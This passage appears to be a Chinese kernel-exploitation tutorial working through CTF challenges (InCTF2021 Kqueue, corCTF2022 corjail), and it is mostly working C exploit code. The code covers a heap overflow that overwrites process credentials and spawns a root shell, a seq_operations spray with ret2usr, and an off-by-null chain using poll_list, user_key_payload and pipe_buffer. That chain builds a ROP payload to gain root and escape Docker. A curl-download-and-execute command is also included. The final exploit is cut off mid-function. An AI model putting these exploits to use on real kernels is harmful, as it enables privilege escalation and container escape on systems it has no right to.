    // overflow from it to overwrite the cred.
    p.idx = 4;
    p.len = 0xc0 + 0x30;
    // The original reused the 0xa8-byte buffer here, so memset() and the
    // driver's copy ran 0x48 bytes past its end. Use a buffer of the full
    // length instead; calloc() also provides the zero fill.
    free(p.buf);
    p.buf = calloc(1, p.len);
    if (p.buf == NULL) {
        puts("[-] calloc error");
        exit(-1);
    }
    ioctl(bof_fd, 8, &p);
    if (!pid) {
        // Everything up to and including egid is now 0, which is enough to be treated as root.
        size_t uid = getuid();
        printf("[*] uid: %zx\n", uid);
        if (!uid) {
            puts("[+] root success");
            // Credentials changed; a shell started now is a root shell.
            system("/bin/sh");
        } else {
            puts("[-] root fail");
        }
    } else {
        wait(0);
    }
    return 0;
}

堆溢出 + 堆喷射覆写 seq_operations 控制内核执行流

原题为 InCTF2021 - Kqueue ，这里简化分析过程用 heap_bof 代替。

seq_operations 结构如下，该结构在打开 /proc/self/stat 时从 kmalloc-32 中分配。

/* Quoted kernel structure: a table of four iterator callbacks (start, stop, next, show). */
struct seq_operations {
	void * (*start) (struct seq_file *m, loff_t *pos);
	void (*stop) (struct seq_file *m, void *v);
	void * (*next) (struct seq_file *m, void *v, loff_t *pos);
	int (*show) (struct seq_file *m, void *v);
};

在读取 stat 文件时会调用 seq_operations 的 start 函数指针。

ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos)
{
	struct seq_file *m = file->private_data;
	...
	p = m->op->start(m, &pos);
	...

当我们在 heap_bof 驱动分配 0x20 大小的 object 后打开大量的 stat 文件就有很大概率在 heap_bof 分配的 object 的溢出范围内存在 seq_operations 结构体。

由于这道题关闭了 SMEP，SMAP 和 KPTI 保护，因此我们可以覆盖 start 函数指针为用户空间的提权代码实现提权。

至于 KASLR 可以通过泄露栈上的数据绕过。

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <unistd.h>

/* Request block passed to the bof driver's ioctl. */
struct param {
    size_t len;       // length of the data
    char *buf;        // user-space buffer address
    long long idx;// index into the ptr array
};

/* Number of /proc/self/stat descriptors main() opens. */
const int SEQ_NUM = 0x200;
/* Size in bytes of the buffer main() writes through the driver (0x20 * 8). */
const int DATA_SIZE = 0x20 * 8;

/* Start /bin/sh through system(); user_rip is initialised to this function's address. */
void get_shell() {
    system("/bin/sh");
}

size_t user_cs, user_rflags, user_sp, user_ss, user_rip = (size_t) get_shell;

/*
 * Capture the current cs, ss, rsp and rflags into user_cs, user_ss, user_sp
 * and user_rflags, then print a confirmation line.
 * NOTE(review): destination-first operands, so this presumably requires
 * Intel-syntax inline asm (e.g. gcc -masm=intel) -- confirm.
 */
void save_status() {
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"             /* rflags goes through the stack */
            "pop user_rflags;");
    puts("[*] status has been saved.");
}

/* Calling-convention attribute applied to the kernel function pointer below.
 * NOTE(review): regparm is an i386 attribute; presumably a no-op on x86-64 -- confirm. */
#define KERNCALL __attribute__((regparm(3)))

/* Pre-offset address of commit_creds; get_root() adds kernel_offset to it. */
void *(*commit_creds)(void *) KERNCALL = (void *) 0xFFFFFFFF810A1340;

/* Pre-offset address of init_cred; get_root() adds kernel_offset to it. */
void *init_cred = (void *) 0xFFFFFFFF81E496C0;

/* Filled in by get_root(): value read from the stack minus 0xffffffff81229378. */
size_t kernel_offset;

/*
 * Function whose address main() writes over the sprayed region.
 *
 * It reads the qword at [rsp + 8] into kernel_offset, subtracts
 * 0xffffffff81229378 to obtain the load offset, rebases commit_creds and
 * init_cred with it, calls commit_creds(init_cred), and then returns to user
 * mode by hand: swapgs, push ss / sp / rflags / cs / rip, iretq.
 *
 * NOTE(review): [rsp + 8] is presumably a kernel return address at function
 * entry; the exact stack offset depends on the prologue the compiler emits
 * -- confirm for the build flags in use.
 */
void get_root() {
    __asm__(
            "mov rax, [rsp + 8];"
            "mov kernel_offset, rax;"
            );
    kernel_offset -= 0xffffffff81229378;
    commit_creds = (void *) ((size_t) commit_creds + kernel_offset);
    init_cred = (void *) ((size_t) init_cred + kernel_offset);
    commit_creds(init_cred);
    /* Build the iretq frame in the order the instruction pops it (rip last pushed). */
    __asm__(
            "swapgs;"
            "push user_ss;"
            "push user_sp;"
            "push user_rflags;"
            "push user_cs;"
            "push user_rip;"
            "iretq;"
            );
}

/*
 * Entry point of the seq_operations variant: allocate 0x40 driver objects of
 * 0x20 bytes, open SEQ_NUM /proc/self/stat descriptors, write DATA_SIZE bytes
 * filled with the address of get_root through slot 0, save the user context
 * and read one byte from every stat descriptor.
 *
 * Exits with -1 if the device cannot be opened; returns 0 otherwise.
 */
int main() {
    /* Absolute path, as used by the other programs for this driver; the
     * original relative "dev/bof" only worked when the cwd was "/". */
    int bof_fd = open("/dev/bof", O_RDWR);
    if (bof_fd < 0) {
        puts("[-] Failed to open bof.");
        exit(-1);
    }
    struct param p = {0x20, malloc(0x20), 0};
    for (int i = 0; i < 0x40; i++) {
        ioctl(bof_fd, 5, &p);
    }

    int seq_fd[SEQ_NUM];
    for (int i = 0; i < SEQ_NUM; i++) {
        seq_fd[i] = open("/proc/self/stat", O_RDONLY);
        if (seq_fd[i] < 0) {
            puts("[-] Failed to open stat.");
        }
    }
    puts("[*] seq_operations spray finished.");

    free(p.buf); /* the 0x20-byte buffer is no longer needed */
    p.len = DATA_SIZE;
    p.buf = malloc(DATA_SIZE);
    p.idx = 0;
    /* Fill the whole buffer with the address of get_root, one pointer per slot. */
    for (int i = 0; i < DATA_SIZE; i += sizeof(size_t)) {
        *(size_t *) &p.buf[i] = (size_t) get_root;
    }
    ioctl(bof_fd, 8, &p);
    puts("[*] Heap overflow finished.");

    save_status();
    for (int i = 0; i < SEQ_NUM; i++) {
        read(seq_fd[i], p.buf, 1);
    }

    return 0;
}

Off By Null

例题：corCTF2022 corjail（kmalloc-4k）

这里以 corCTF 2022 corjail 为例进行讲解。

题目驱动存在 0x1000 大小 object 的 off by null 漏洞。

v7 = (char *)kmem_cache_alloc_trace(kmalloc_caches[12], 0xA20LL, 0x1000LL);
printk("\x016[CoRMon::Debug] Syscalls @ %#llx\n", v7);
if ( v7 )
{
  _check_object_size(v7, v5, 0LL);
  if ( copy_from_user(v7, a2, v5) )
  {
    printk("\x013[CoRMon::Error] copy_from_user() call failed!\n");
    return -14LL;
  }
  else
  {
    v7[v5] = 0;
    if ( (unsigned int)update_filter(v7) )
    {
      kfree(v7);
      return -22LL;
    }
    else
    {
      kfree(v7);
      return a3;
    }
  }

首先喷射大量 0x20 大小的 user_key_payload 和下图所示 0x1000 + 0x20 的 poll_list 。

此时内存中 object 的分布如下图所示，其中黄色的是 user_key_payload ，绿色的是 poll_list ，白色是空闲 object 。

通过 off by null 修改 0x1000 大小的 poll_list ，使得指向 0x20 大小 poll_list 的 next 指针指向 user_key_payload 。

之后释放所有的 poll_list 结构，被 next 指向的 user_key_payload 也被释放，形成 UAF 。注意，为了确保释放 poll_list 不出错，要保证 0x20 大小的 poll_list 的 next 指针为 NULL 。也就是 user_key_payload 的前 8 字节为 NULL 。由于 user_key_payload 的前 8 字节没有初始化，因此可以在申请 user_key_payload 前先用 setxattr 把前 8 字节置为 NULL 。另外实测 kmalloc-32 的 freelist 偏移为 16 字节，不会覆盖 next 指针。

喷射 seq_operations 利用 seq_operations->next 的低四字节覆盖 user_key_payload->datalen 为 0x4370 实现 user_key_payload 越界读， user_key_payload->data 前 8 字节被覆盖为 seq_operations->show ，可以泄露内核基址。另外可以根据是否越界读判断该 user_key_payload 是否被 seq_operations 覆盖。

之后释放不能越界读的 user_key_payload 并喷射 tty_file_private 填充产生的空闲 object 。之后再次越界读泄露 tty_file_private->tty 指向的 tty_struct ，我们定义这个地址为 target_object 。

释放 seq_operations 喷射 0x20 大小的 poll_list 。在 poll_list 被释放前，释放劫持的 user_key_payload ，利用 setxattr 修改 poll_list 的 next 指针指向 target_object - 0x18 。为了实现 setxattr 的喷射效果，setxattr 修改过的 object 通过申请 user_key_payload 劫持，确保下次 setxattr 修改的是另外的 object 。

趁 poll_list 还没有释放，释放 tty_struct 并申请 pipe_buffer ，将 target_object 替换为 pipe_buffer 。

之后 poll_list 释放导致 target_object - 0x18 区域释放。我们可以申请一个 0x400 大小的 user_key_payload 劫持 target_object - 0x18 ，从而劫持 pipe_buffer 实现控制流劫持。

本题除了内核提权外还需要 Docker 逃逸，具体实现为修改 task_struct 的 fs 指向 init_fs 。

// commit_creds(&init_creds)
*rop++ = pop_rdi_ret;
*rop++ = init_cred;
*rop++ = commit_creds;

// current = find_task_by_vpid(getpid())
// (getpid() is evaluated in user space while the chain is being built)
*rop++ = pop_rdi_ret;
*rop++ = getpid();
*rop++ = find_task_by_vpid;

// current->fs = &init_fs
// rax += 0x6e0, then store rbx (= init_fs) at [rax].
// NOTE(review): 0x6e0 is presumably the offset of `fs` in task_struct for this kernel build -- confirm.
*rop++ = pop_rcx_ret;
*rop++ = 0x6e0;
*rop++ = add_rax_rcx_ret;
*rop++ = pop_rbx_ret;
*rop++ = init_fs;
*rop++ = mov_mmrax_rbx_pop_rbx_ret;
// leave one slot unwritten; presumably consumed by the gadget's trailing `pop rbx`
rop++;

利用不是很稳定，不过多次尝试还是能打通的。

由于题目环境存在 curl 命令，因此可以在题目所在文件夹下创建 web 服务。

1	python -m SimpleHTTPServer 8000

然后利用 curl 下载 exp 并执行。

1	curl 192.168.64.149:8000/exp -o /tmp/exp && chmod +x /tmp/exp && /tmp/exp

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <asm/ldt.h>
#include <assert.h>
#include <ctype.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/keyctl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <sched.h>
#include <semaphore.h>
#include <signal.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/prctl.h>
#include <sys/sem.h>
#include <sys/shm.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/xattr.h>
#include <unistd.h>
#include <sys/sysinfo.h>

#define PAGE_SIZE 0x1000

/*
 * Return a pseudo-random integer in [min, max) using rand().
 *
 * When max == min the range is empty; min is returned instead of evaluating
 * `rand() % 0`, which is undefined (SIGFPE on x86).
 */
int randint(int min, int max) {
    int span = max - min;
    if (span == 0) {
        return min;
    }
    return min + (rand() % span);
}

/*
 * Pin the caller to a single CPU.
 *
 * fixed:  true  -> CPU 0;
 *         false -> a random CPU in [1, get_nprocs()).
 * thread: true  -> apply to the calling thread (pthread_setaffinity_np);
 *         false -> apply via sched_setaffinity() on getpid().
 *
 * On a machine with a single CPU there is no "other" CPU to choose, so CPU 0
 * is used; the original evaluated randint(1, 1), i.e. a modulo by zero.
 * The result of the affinity call is not checked.
 */
void bind_core(bool fixed, bool thread) {
    int cpu = 0;
    if (!fixed) {
        int nprocs = get_nprocs();
        if (nprocs > 1) {
            cpu = randint(1, nprocs);
        }
    }

    cpu_set_t cpu_set;
    CPU_ZERO(&cpu_set);
    CPU_SET(cpu, &cpu_set);
    if (thread) {
        pthread_setaffinity_np(pthread_self(), sizeof(cpu_set), &cpu_set);
    } else {
        sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
    }
}

/*
 * Print a hex dump of `len` bytes starting at `addr` to stdout.
 *
 * desc: optional title, printed as "[*] <desc>:" when not NULL.
 * Each output row shows the byte offset, up to four 64-bit words in hex
 * (missing words are padded with blanks) and the printable form of the
 * row's bytes, with '.' for non-printable ones. Only len / 8 whole words
 * are considered when deciding how many rows to print.
 */
void qword_dump(char *desc, void *addr, int len) {
    const uint64_t *qwords = addr;
    const uint8_t *bytes = addr;
    const int qword_cnt = len / 8;

    if (desc != NULL) {
        printf("[*] %s:\n", desc);
    }

    for (int row = 0; row < qword_cnt; row += 4) {
        const int row_off = row * 8;

        printf("  %04x", row_off);
        for (int col = 0; col < 4; col++) {
            if (row + col < qword_cnt) {
                printf(" 0x%016lx", qwords[row + col]);
            } else {
                printf("                   ");
            }
        }
        printf("   ");
        /* ASCII column: at most 32 bytes, never past the end of the buffer */
        for (int off = row_off; off < row_off + 32 && off < len; off++) {
            printf("%c", isprint(bytes[off]) ? bytes[off] : '.');
        }
        puts("");
    }
}

/*
 * Report whether addr lies in [0xFFFFFFFF80000000, 0xFFFFFFFFFEFFFFFF],
 * the range this program treats as kernel text.
 * (A tighter upper bound of 0xFFFFFFFF9FFFFFFF was tried previously.)
 */
bool is_kernel_text_addr(size_t addr) {
    const size_t lowest = 0xFFFFFFFF80000000;
    const size_t highest = 0xFFFFFFFFFEFFFFFF;

    if (addr < lowest) {
        return false;
    }
    return addr <= highest;
}

/*
 * Report whether addr lies in [0xFFFF888000000000, 0xFFFFc87FFFFFFFFF],
 * the range this program treats as the kernel's direct mapping.
 */
bool is_dir_mapping_addr(size_t addr) {
    const size_t lowest = 0xFFFF888000000000;
    const size_t highest = 0xFFFFc87FFFFFFFFF;

    if (addr < lowest) {
        return false;
    }
    return addr <= highest;
}

/* Sentinel returned by the offset helpers when no offset could be derived. */
#define INVALID_KERNEL_OFFSET 0x1145141919810

/* Reference addresses that kernel_offset_query() compares a leaked pointer against. */
const size_t kernel_addr_list[] = {
        0xffffffff813275c0,
        0xffffffff812d4320,
        0xffffffff812d4340,
        0xffffffff812d4330
};

/*
 * Derive the kernel load offset from one leaked pointer.
 *
 * kernel_text_leak: candidate value.
 * Returns leak - reference for the first entry of kernel_addr_list whose low
 * 12 bits match the leak and whose distance from it is a multiple of
 * 0x100000. Returns INVALID_KERNEL_OFFSET when the value is outside the
 * kernel text range (silently) or matches no entry (after logging it).
 */
size_t kernel_offset_query(size_t kernel_text_leak) {
    if (!is_kernel_text_addr(kernel_text_leak)) {
        return INVALID_KERNEL_OFFSET;
    }
    const size_t count = sizeof(kernel_addr_list) / sizeof(kernel_addr_list[0]);
    for (size_t i = 0; i < count; i++) {
        const size_t known = kernel_addr_list[i];
        const size_t delta = kernel_text_leak - known;
        if (!((kernel_text_leak ^ known) & 0xFFF) && delta % 0x100000 == 0) {
            return delta;
        }
    }
    /* %zx is the conversion that matches size_t */
    printf("[-] unknown kernel addr: %#zx\n", kernel_text_leak);
    return INVALID_KERNEL_OFFSET;
}

/*
 * Scan a buffer, one 64-bit word at a time, for a value that
 * kernel_offset_query() can turn into a load offset.
 *
 * buf: buffer to scan; len: its size in bytes (only len / 8 whole words are
 * examined; a non-positive len examines nothing).
 * Returns the first offset found, after logging the leak and the offset, or
 * INVALID_KERNEL_OFFSET when no word qualifies.
 */
size_t search_kernel_offset(void *buf, int len) {
    const size_t *words = buf;
    const int word_cnt = len / 8;

    for (int i = 0; i < word_cnt; i++) {
        size_t kernel_offset = kernel_offset_query(words[i]);
        if (kernel_offset == INVALID_KERNEL_OFFSET) {
            continue;
        }
        /* %zx is the conversion that matches size_t */
        printf("[+] kernel leak addr: %#zx\n", words[i]);
        printf("[+] kernel offset: %#zx\n", kernel_offset);
        return kernel_offset;
    }
    return INVALID_KERNEL_OFFSET;
}

size_t user_cs, user_rflags, user_sp, user_ss;

/*
 * Capture the current cs, ss, rsp and rflags into user_cs, user_ss, user_sp
 * and user_rflags, then print a confirmation line.
 * NOTE(review): destination-first operands, so this presumably requires
 * Intel-syntax inline asm (e.g. gcc -masm=intel) -- confirm.
 */
void save_status() {
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"             /* rflags goes through the stack */
            "pop user_rflags;");
    puts("[*] status has been saved.");
}

/* Arguments handed to alloc_poll_list(): number of pollfd entries and the
 * timeout value passed to poll(). */
typedef struct {
    int nfds, timer;
} poll_args;

/* Local declaration of a linked chunk of pollfd entries; this file only uses
 * it for sizeof() in size calculations.
 * NOTE(review): presumably mirrors the kernel's struct poll_list -- confirm layout. */
struct poll_list {
    struct poll_list *next;
    int len;
    struct pollfd entries[];
};

/* Guards updates of poll_threads made by the poll worker threads. */
pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
/* poll_threads: workers currently between their increment and decrement in alloc_poll_list();
 * poll_cnt: workers created by create_poll_thread() since the last join. */
size_t poll_threads, poll_cnt;

/*
 * Thread body: open /etc/passwd nfds times, then block in poll() on those
 * descriptors for `timer`.
 *
 * args: pointer to a poll_args (nfds, timer).
 * The thread pins itself to CPU 0 before poll() and to a random other CPU
 * afterwards, and brackets the poll() call with a mutex-protected
 * increment/decrement of poll_threads.
 * Always returns NULL (the original had no return statement in a function
 * declared to return void *).
 */
void *alloc_poll_list(void *args) {
    int nfds = ((poll_args *) args)->nfds;
    int timer = ((poll_args *) args)->timer;

    struct pollfd *pfds = calloc(nfds, sizeof(struct pollfd));
    for (int i = 0; i < nfds; i++) {
        pfds[i].fd = open("/etc/passwd", O_RDONLY);
        pfds[i].events = POLLERR;
    }

    bind_core(true, true);

    pthread_mutex_lock(&mutex);
    poll_threads++;
    pthread_mutex_unlock(&mutex);
    poll(pfds, nfds, timer);

    bind_core(false, true);

    pthread_mutex_lock(&mutex);
    poll_threads--;
    pthread_mutex_unlock(&mutex);

    return NULL;
}

/* Extra pollfd entries added to every request by create_poll_thread().
 * NOTE(review): presumably the number of entries the kernel keeps on its stack before allocating -- confirm. */
#define N_STACK_PPS 30
/* Capacity of poll_tid. */
#define POLL_NUM 0x1000

/* Thread ids of the poll workers, indexed by creation order. */
pthread_t poll_tid[POLL_NUM];

void create_poll_thread(size_t size, int timer) {
    poll_args *args = calloc(1, sizeof(poll_args));
    args->nfds = (size - (size + PAGE_SIZE - 1) / PAGE_SIZE * sizeof(struct poll_list)) / sizeof(struct pollfd) + N_STACK_PPS;
    args->timer = timer;
    pthread_create(&poll_tid[poll_cnt++], 0, alloc_poll_list, args);
}

void wait_poll_start() {
    while (poll_threads != poll_cnt);
}

/*
 * Join every worker created since the last call and reset the counters.
 *
 * confuse:      optional callback invoked once after each join (may be NULL).
 * confuse_args: argument passed through to confuse.
 *
 * The loop runs over poll_cnt, the number of threads created. The original
 * used poll_threads as the bound, but each worker decrements that counter as
 * it finishes, so the bound shrank while joining and some threads were never
 * joined.
 */
void join_poll_threads(void (*confuse)(void *), void *confuse_args) {
    const size_t created = poll_cnt;
    for (size_t i = 0; i < created; i++) {
        pthread_join(poll_tid[i], NULL);
        if (confuse != NULL) {
            confuse(confuse_args);
        }
    }
    poll_cnt = poll_threads = 0;
}

/* Two-pointer header (next link and callback), pointer-aligned; used below as
 * the first member of user_key_payload under the name rcu_head. */
struct callback_head {
    struct callback_head *next;

    void (*func)(struct callback_head *head);
} __attribute__((aligned(sizeof(void *))));

/* Aliases so that the structure definitions below compile unchanged in user space. */
#define rcu_head callback_head
#define __aligned(x)                    __attribute__((__aligned__(x)))
typedef unsigned long long u64;

/* Header that precedes a key's data; key_alloc() subtracts its size from the
 * requested payload length. */
struct user_key_payload {
    struct rcu_head rcu;        /* RCU destructor */
    unsigned short datalen;    /* length of this data */
    char data[0] __aligned(__alignof__(u64)); /* actual data */
};

/* Number of keys the program manages. */
#define KEY_NUM 199
/* Key serial numbers returned by add_key, indexed by the caller-chosen id. */
int key_id[KEY_NUM];

/*
 * Add a "user" key to the process keyring and remember its serial number.
 *
 * id:          slot in key_id; also used, in decimal, as the key description.
 * payload:     key data.
 * payload_len: total size wanted including the user_key_payload header; the
 *              header size is subtracted before the syscall.
 * Returns the value of the add_key syscall (also stored in key_id[id]).
 */
int key_alloc(int id, void *payload, int payload_len) {
    /* `= {0}` is standard C (the original `= {}` needs C23 or a GNU extension),
     * and snprintf bounds the write to the buffer. */
    char description[0x10] = {0};
    snprintf(description, sizeof(description), "%d", id);
    key_id[id] = syscall(__NR_add_key, "user", description, payload,
                         payload_len - sizeof(struct user_key_payload), KEY_SPEC_PROCESS_KEYRING);
    return key_id[id];
}

/*
 * Issue keyctl(KEYCTL_UPDATE) on the key stored in key_id[id].
 * payload / plen: new data and its length. Returns the syscall result.
 */
int key_update(int id, void *payload, size_t plen) {
    long rc = syscall(__NR_keyctl, KEYCTL_UPDATE, key_id[id], payload, plen);
    return rc;
}

/*
 * Issue keyctl(KEYCTL_READ) on the key stored in key_id[id].
 * bufer / buflen: destination buffer and its size. Returns the syscall result.
 */
int key_read(int id, void *bufer, size_t buflen) {
    long rc = syscall(__NR_keyctl, KEYCTL_READ, key_id[id], bufer, buflen);
    return rc;
}

/* Issue keyctl(KEYCTL_REVOKE) on the key stored in key_id[id]; returns the syscall result. */
int key_revoke(int id) {
    long rc = syscall(__NR_keyctl, KEYCTL_REVOKE, key_id[id], 0, 0, 0);
    return rc;
}

/* Issue keyctl(KEYCTL_UNLINK) to remove key_id[id] from the process keyring; returns the syscall result. */
int key_unlink(int id) {
    long rc = syscall(__NR_keyctl, KEYCTL_UNLINK, key_id[id], KEY_SPEC_PROCESS_KEYRING);
    return rc;
}

/* Doubly linked list node (next/prev pointers), declared locally for tty_file_private. */
struct list_head {
    struct list_head *next, *prev;
};
/* Local declaration of the per-open tty bookkeeping object: a tty pointer, a
 * file pointer and a list node (0x20 bytes on a 64-bit build).
 * NOTE(review): presumably mirrors the kernel structure of the same name -- confirm layout. */
struct tty_file_private {
    struct tty_struct *tty;
    struct file *file;
    struct list_head list;
};

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/*
 * Local declaration of one pipe buffer slot: page pointer, offset/len within
 * the page, operations table, flags and a private word.
 * Reads start from len to offset, writes start from offset.
 * NOTE(review): the type is spelled "pipe_bufer" throughout this file; it
 * presumably mirrors the kernel's struct pipe_buffer -- confirm layout.
 */
struct pipe_bufer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};

/* Table of four callbacks operating on a pipe buffer: confirm, release, try_steal, get. */
struct pipe_buf_operations {
    /*
     * ->confirm() verifies that the data in the pipe buffer is there
     * and that the contents are good. If the pages in the pipe belong
     * to a file system, we may need to wait for IO completion in this
     * hook. Returns 0 for good, or a negative error value in case of
     * error.  If not present all pages are considered good.
     */
    int (*confirm)(struct pipe_inode_info *, struct pipe_bufer *);

    /*
     * When the contents of this pipe buffer has been completely
     * consumed by a reader, ->release() is called.
     */
    void (*release)(struct pipe_inode_info *, struct pipe_bufer *);

    /*
     * Attempt to take ownership of the pipe buffer and its contents.
     * ->try_steal() returns %true for success, in which case the contents
     * of the pipe (the buf->page) is locked and now completely owned by the
     * caller. The page may then be transferred to a different mapping, the
     * most often used case is insertion into different file address space
     * cache.
     */
    int (*try_steal)(struct pipe_inode_info *, struct pipe_bufer *);

    /*
     * Get a reference to the pipe buffer.
     */
    int (*get)(struct pipe_inode_info *, struct pipe_bufer *);
};

/*
 * Replace the current process image with an interactive bash
 * ("/bin/bash -i") and an empty environment. Returns only if execve() fails.
 */
void get_shell(void) {
    char *shell = "/bin/bash";
    char *argv[] = {shell, "-i", NULL};

    execve(shell, argv, NULL);
}

/* Number of /proc/self/stat descriptors main() opens (2048 + 128). */
#define SEQ_NUM (2048 + 128)
#define TTY_NUM 72
#define PIPE_NUM 1024

/* Descriptor of /proc_rw/cormon, opened by main(). */
int cormon_fd;
/* Shared scratch buffer used by main() for key payloads, writes and reads. */
char buf[0x20000];

/*
 * Callback for join_poll_threads(): open /proc/self/stat once. The
 * descriptor is not stored or closed, and args is ignored.
 */
void seq_confuse(void *args) {
    (void) args;
    (void) open("/proc/self/stat", O_RDONLY);
}

/* Kernel symbol and gadget addresses, named after the symbol or instruction
 * sequence each is expected to point at.
 * NOTE(review): presumably unslid values to which the leaked kernel offset is
 * added later in main() -- confirm against the rest of the file. */
size_t push_rsi_pop_rsp_ret = 0xFFFFFFFF817AD641;
size_t pop_rdi_ret = 0xffffffff8116926d;
size_t init_cred = 0xFFFFFFFF8245A960;
size_t commit_creds = 0xFFFFFFFF810EBA40;
size_t pop_r14_pop_r15_ret = 0xffffffff81001615;
size_t find_task_by_vpid = 0xFFFFFFFF810E4FC0;
size_t init_fs = 0xFFFFFFFF82589740;
size_t pop_rcx_ret = 0xffffffff8101f5fc;
size_t add_rax_rcx_ret = 0xffffffff8102396f;
size_t mov_mmrax_rbx_pop_rbx_ret = 0xffffffff817e1d6d;
size_t pop_rbx_ret = 0xffffffff811bce34;
size_t swapgs_ret = 0xffffffff81a05418;
size_t iretq = 0xffffffff81c00f97;

/*
 * Exploit driver for the cormon challenge device (/proc_rw/cormon).
 *
 * The stages, in order, follow the progress messages printed below:
 *   1. groom kmalloc-32 with /proc/self/stat opens and user keys,
 *   2. corrupt a poll_list and use it to free an object that is then
 *      re-occupied, leaking a kernel pointer through a user key,
 *   3. leak a tty_struct address through the same key,
 *   4. repeat the poll_list trick to free that tty_struct, re-occupy it
 *      with pipe buffers and then with a key payload holding a ROP chain,
 *   5. close the pipes so that the fake ->release pointer is invoked.
 *
 * The order of allocations and frees is what makes the exploit work; do not
 * reorder statements. Helpers such as key_alloc/key_read/key_unlink,
 * create_poll_thread/wait_poll_start/join_poll_threads and
 * search_kernel_offset are defined outside this chunk.
 */
int main() {
    /* Pin the process (argument `true` selects the fixed core) and record user-mode register state for the iretq frame. */
    bind_core(true, false);
    save_status();
    /* Any SIGSEGV delivered to this process runs get_shell(). */
    signal(SIGSEGV, (void *) get_shell);

    cormon_fd = open("/proc_rw/cormon", O_RDWR);
    if (cormon_fd < 0) {
        perror("[-] failed to open cormon.");
        exit(-1);
    }
    size_t kernel_offset;
    int target_key;
    puts("[*] Saturating kmalloc-32 partial slabs...");

    int seq_fd[SEQ_NUM];
    for (int i = 0; i < SEQ_NUM; i++) {
        seq_fd[i] = open("/proc/self/stat", O_RDONLY);
        if (seq_fd[i] < 0) {
            perror("[-] failed to open stat.");
            exit(-1);
        }
        /* After the first 2048 opens, run the key spray / corruption stage once, then keep opening the remaining 128. */
        if (i == 2048) {
            puts("[*] Spraying user keys in kmalloc-32...");
            for (int j = 0; j < KEY_NUM; j++) {
                /* NOTE(review): setxattr is issued right before each key_alloc, presumably to pre-fill the chunk the key then reuses -- confirm. */
                setxattr("/tmp/exp", "sky123", buf, 32, XATTR_CREATE);
                key_alloc(j, buf, 32);
                /* Part-way through the key spray, start 14 poll threads from another core, then return to the fixed core. */
                if (j == 72) {
                    bind_core(false, false);
                    puts("[*] Creating poll threads...");
                    for (int k = 0; k < 14; k++) {
                        create_poll_thread(PAGE_SIZE + sizeof(struct poll_list) + sizeof(struct pollfd), 3000);
                    }
                    bind_core(true, false);
                    wait_poll_start();
                }
            }
            puts("[*] Corrupting poll_list next pointer...");
            /* The write to the cormon device is the step that triggers the driver bug. */
            write(cormon_fd, buf, PAGE_SIZE);
            puts("[*] Triggering arbitrary free...");
            join_poll_threads(seq_confuse, NULL);
            puts("[*] Overwriting user key size / Spraying seq_operations structures...");
        }
    }
    puts("[*] Leaking kernel pointer...");

    /* Read every key back; the first one whose contents yield a kernel offset is the corrupted key. */
    for (int i = 0; i < KEY_NUM; i++) {
        int len = key_read(i, buf, sizeof(buf));
        kernel_offset = search_kernel_offset(buf, len);
        if (kernel_offset != INVALID_KERNEL_OFFSET) {
            qword_dump("dump leak memory", buf, 0x1000);
            target_key = i;
            break;
        }
    }
    if (kernel_offset == INVALID_KERNEL_OFFSET) {
        puts("[-] failed to leak kernel offset,try again.");
        exit(-1);
    }

    /* Rebase every gadget / symbol address by the leaked offset. */
    push_rsi_pop_rsp_ret += kernel_offset;
    pop_rdi_ret += kernel_offset;
    init_cred += kernel_offset;
    commit_creds += kernel_offset;
    pop_r14_pop_r15_ret += kernel_offset;
    find_task_by_vpid += kernel_offset;
    init_fs += kernel_offset;
    pop_rcx_ret += kernel_offset;
    add_rax_rcx_ret += kernel_offset;
    mov_mmrax_rbx_pop_rbx_ret += kernel_offset;
    pop_rbx_ret += kernel_offset;
    swapgs_ret += kernel_offset;
    iretq += kernel_offset;

    puts("[*] Freeing user keys...");
    /* Release every key except the corrupted one, which is still needed as a read primitive. */
    for (int i = 0; i < KEY_NUM; i++) {
        if (i != target_key) {
            key_unlink(i);
        }
    }
    sleep(1);

    puts("[*] Spraying tty_file_private / tty_struct structures...");
    int tty_fd[TTY_NUM];
    for (int i = 0; i < TTY_NUM; i++) {
        tty_fd[i] = open("/dev/ptmx", O_RDWR | O_NOCTTY);
        if (tty_fd[i] < 0) {
            /* A failed open is reported but not fatal. */
            perror("[-] failed to open ptmx");
        }
    }

    puts("[*] Leaking heap pointer...");

    size_t target_object = -1;
    int len = key_read(target_key, buf, sizeof(buf));
    qword_dump("dump leak memory", buf, 0x1000);
    /*
     * Scan the leaked bytes in 8-byte steps for something shaped like a
     * tty_file_private: a 0x100-aligned direct-mapping pointer in ->tty and
     * a list node whose next and prev are equal and non-NULL.
     */
    for (int i = 0; i < len; i += 8) {
        struct tty_file_private *head = (void *) &buf[i];
        if (is_dir_mapping_addr((size_t) head->tty) && !(((size_t) head->tty) & 0xFF)
            && head->list.next == head->list.prev && head->list.prev != NULL) {
            qword_dump("leak tty_struct addr from tty_file_private", &buf[i], sizeof(struct tty_file_private));
            target_object = (size_t) head->tty;
            printf("[+] tty_struct addr: %p\n", target_object);
            break;
        }
    }
    if (target_object == -1) {
        puts("[-] failed to leak tty_struct addr.");
        exit(-1);
    }

    puts("[*] Freeing seq_operation structures...");
    /* Only the 128 descriptors opened after the key spray are closed. */
    for (int i = 2048; i < SEQ_NUM; i++) {
        close(seq_fd[i]);
    }

    bind_core(false, false);

    puts("[*] Creating poll threads...");
    for (int i = 0; i < 192; i++) {
        create_poll_thread(sizeof(struct poll_list) + sizeof(struct pollfd), 3000);
    }

